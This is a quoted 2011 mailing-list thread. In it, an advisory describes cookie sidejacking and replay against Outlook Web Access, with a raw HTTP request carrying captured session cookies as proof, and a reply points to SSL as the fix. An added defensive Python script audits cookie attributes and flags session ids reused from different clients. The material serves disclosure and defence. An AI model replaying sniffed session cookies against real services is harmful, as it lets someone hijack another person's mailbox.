On Tue, Oct 25, 2011 at 8:26 PM, information security < [email protected]> wrote:
> > ==============================================================================
> > Microsoft Outlook Web Access Session Sidejacking/Session Replay Vulnerability
> > ===============================================================================
> >
> > by
> >
> > Asheesh Kumar Mani Tripathi
> >
> > # code by Asheesh Kumar Mani Tripathi
> > # email [email protected]
> >
> > # Credit by Asheesh Anaconda
> > # Date 25th Oct 2011
> >
> > # Product Outlook Web Access 8.2.254.0
> >
> > # Vulnerability
> > SideJacking is the process of sniffing web cookies, then replaying them to
> > clone another user's web session. Using a cloned web session, the jacker can
> > exploit the victim's previously-established site access.
> >
> > # Impact
> > This allows attackers that can read the network traffic to intercept all
> > the data that is submitted to the server or web pages viewed by the client.
> > Since this data includes the session cookie, it allows him to impersonate
> > the victim, even if the password itself is not compromised.
> >
> > # Proof of concept
> >
> > ========================================================================================================================
> > Request
> > ========================================================================================================================
> > GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
> > Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt, */*
> > Referer: https://xxxwebmail.xxx.xxx/owa/
> > Accept-Language: en-in
> > User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
> > Accept-Encoding: gzip, deflate
> > Host: xxxwebmail.xxx.xxx
> > Connection: Keep-Alive
> > Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000; cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx"; UserContext=e8997d6036554ada88a62dc9f2cf65d3
> >
> > ========================================================================================================================
> > Response
> > ========================================================================================================================
> > HTTP/1.1 200 OK
> > Cache-Control: no-cache
> > Pragma: no-cache
> > Content-Length: 58676
> > Content-Type: text/html; charset=utf-8
> > Expires: -1
> > Server: Microsoft-IIS/7.0
> > X-AspNet-Version: 2.0.50727
> > X-OWA-Version: 8.2.254.0
> > X-UA-Compatible: IE=EmulateIE7
> > X-Powered-By: ASP.NET
> > Date: Tue, 25 Oct 2011 15:00:01 GMT
> >
> > # If you have any questions, comments, or concerns, feel free to contact me.
>
> Probably I can't understand. Is there truly someone so crazy as to not use SSL for OWA access?
> SSL stops sidejacking, and tools - nice FWIW - such as Hamster and Ferret, just for example.
>
> Best Regards
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
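The advisory above describes a cookie being sniffed and replayed from a second host, and the reply points at transport encryption as the fix. What a defender would want beside that exchange is a way to check both halves: that a session cookie is only ever issued with the attributes that keep it off plaintext HTTP, and a way to spot a session id that turns up from more than one client. The Python below is an added example written for this page; it is not code from the thread, from the advisory's author, or from Microsoft. The access-log format and every log line in it are constructed sample data, and only the cookie name `sessionid` is taken from the advisory (the session values are made up).

```python
"""Defender-side checks for the session sidejacking / replay scenario above.

Added example, not part of the Full-Disclosure thread and not Microsoft/OWA
code. The access-log format and every log line are constructed sample data;
the cookie name "sessionid" comes from the advisory, the session values do not.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Attributes a session cookie should carry when the application is served over
# HTTPS: Secure keeps it off plaintext HTTP, HttpOnly keeps it away from scripts.
REQUIRED_ATTRS = ("secure", "httponly")


def audit_set_cookie(header_value):
    """Return the required attributes missing from a Set-Cookie header value.

    header_value is the text after "Set-Cookie: ", e.g.
    'sessionid=abc; path=/; HttpOnly'.
    """
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return [a for a in REQUIRED_ATTRS if a not in attrs]


# Constructed log format: ISO timestamp, client IP, quoted user-agent,
# then the session cookie (or "-" when the request carried none).
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<ua>[^"]*)" sessionid=(?P<sid>[^;\s]+)'
)


def parse_line(line):
    """Parse one constructed log line; return None for lines without a session."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "ip": m.group("ip"),
        "ua": m.group("ua"),
        "sid": m.group("sid"),
    }


def find_replayed_sessions(lines, window=timedelta(minutes=30)):
    """Flag session ids used from more than one client (IP + user-agent)
    within `window` of each other.

    A cookie replayed by a second host looks exactly like this; so can a
    legitimate user switching networks, so treat hits as leads to
    investigate, not as proof of compromise.
    """
    by_sid = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_sid[rec["sid"]].append(rec)

    suspicious = {}
    for sid, recs in by_sid.items():
        first_seen = {}
        for r in sorted(recs, key=lambda r: r["ts"]):
            first_seen.setdefault((r["ip"], r["ua"]), r["ts"])
        if len(first_seen) < 2:
            continue
        times = sorted(first_seen.values())
        # Two distinct clients on one session id inside the window.
        if any(b - a <= window for a, b in zip(times, times[1:])):
            suspicious[sid] = sorted(first_seen)
    return suspicious


# Constructed sample log: the third line is the same cookie from another host.
SAMPLE_LOG = [
    '2011-10-25T15:00:01 10.0.0.5 "MSIE 8.0" sessionid=sid-victim',
    '2011-10-25T15:02:10 10.0.0.5 "MSIE 8.0" sessionid=sid-victim',
    '2011-10-25T15:05:33 10.0.0.77 "Firefox/7.0" sessionid=sid-victim',
    '2011-10-25T15:01:00 10.0.0.8 "MSIE 8.0" sessionid=sid-other',
    '2011-10-25T15:20:00 10.0.0.8 "MSIE 8.0" sessionid=sid-other',
    '2011-10-25T15:00:05 10.0.0.9 "MSIE 8.0" -',
]

if __name__ == "__main__":
    print(audit_set_cookie("sessionid=abc; path=/owa; HttpOnly"))
    for sid, clients in find_replayed_sessions(SAMPLE_LOG).items():
        print(sid, "seen from", clients)
```

The replay check keys on IP plus user-agent rather than IP alone because a cookie replayed from the same NATed network would otherwise hide behind the shared address; the window keeps a user who genuinely changed networks hours later from being reported. Neither check replaces serving the application only over HTTPS, which is what actually stops the cookie from being sniffed in the first place.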
